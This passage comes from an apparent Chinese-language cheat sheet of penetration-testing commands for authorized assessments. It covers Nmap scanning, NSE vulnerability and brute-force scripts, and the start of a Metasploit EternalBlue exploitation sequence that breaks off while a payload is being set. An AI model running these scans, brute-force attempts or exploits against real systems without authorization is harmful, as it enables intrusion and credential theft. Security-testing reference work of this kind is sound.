渗透测试命令

# 渗透测试命令 ## 目的 提供一份全面的渗透测试工具命令参考，包括网络扫描、漏洞利用、密码破解和 Web 应用测试。便于在安全评估期间快速查找命令。 ## 输入/先决条件 - Kali Linux 或渗透测试发行版 - 经授权的目标 IP 地址 - 用于暴力破解的字典文件 - 对目标系统的网络访问权限 - 对工具语法的基本了解 ## 输出/交付物 - 网络枚举结果 - 已识别的漏洞 - 漏洞利用载荷 - 破解的凭据 - Web 漏洞发现结果 ## 核心工作流 ### 1. Nmap 命令 **主机发现：** bash # Ping 扫描 nmap -sP 192.168.1.0/24 # 列出 IP 而不扫描 nmap -sL 192.168.1.0/24 # Ping 扫描（主机发现） nmap -sn 192.168.1.0/24 **端口扫描：** bash # TCP SYN 扫描（隐蔽） nmap -sS 192.168.1.1 # 全连接 TCP 扫描 nmap -sT 192.168.1.1 # UDP 扫描 nmap -sU 192.168.1.1 # 所有端口 (1-65535) nmap -p- 192.168.1.1 # 指定端口 nmap -p 22,80,443 192.168.1.1 **服务检测：** bash # 服务版本 nmap -sV 192.168.1.1 # 操作系统检测 nmap -O 192.168.1.1 # 综合扫描 nmap -A 192.168.1.1 # 跳过主机发现 nmap -Pn 192.168.1.1 **NSE 脚本：** bash # 漏洞扫描 nmap --script vuln 192.168.1.1 # SMB 枚举 nmap --script smb-enum-shares -p 445 192.168.1.1 # HTTP 枚举 nmap --script http-enum -p 80 192.168.1.1 # 检查永恒之蓝 (EternalBlue) nmap --script smb-vuln-ms17-010 192.168.1.1 # 检查 MS08-067 nmap --script smb-vuln-ms08-067 192.168.1.1 # SSH 暴力破解 nmap --script ssh-brute -p 22 192.168.1.1 # FTP 匿名登录 nmap --script ftp-anon 192.168.1.1 # DNS 暴力破解 nmap --script dns-brute 192.168.1.1 # HTTP 方法 nmap -p80 --script http-methods 192.168.1.1 # HTTP 头部 nmap -p80 --script http-headers 192.168.1.1 # SQL 注入检查 nmap --script http-sql-injection -p 80 192.168.1.1 **高级扫描：** bash # Xmas 扫描 nmap -sX 192.168.1.1 # ACK 扫描（防火墙检测） nmap -sA 192.168.1.1 # Window 扫描 nmap -sW 192.168.1.1 # 路由追踪 nmap --traceroute 192.168.1.1 ### 2. Metasploit 命令 **基本用法：** bash # 启动 Metasploit msfconsole # 搜索漏洞利用 search type:exploit name:smb # 使用漏洞利用 use exploit/windows/smb/ms17_010_eternalblue # 显示选项 show options # 设置目标 set RHOST 192.168.1.1 # 设置载荷 set PAYLOAD windows/met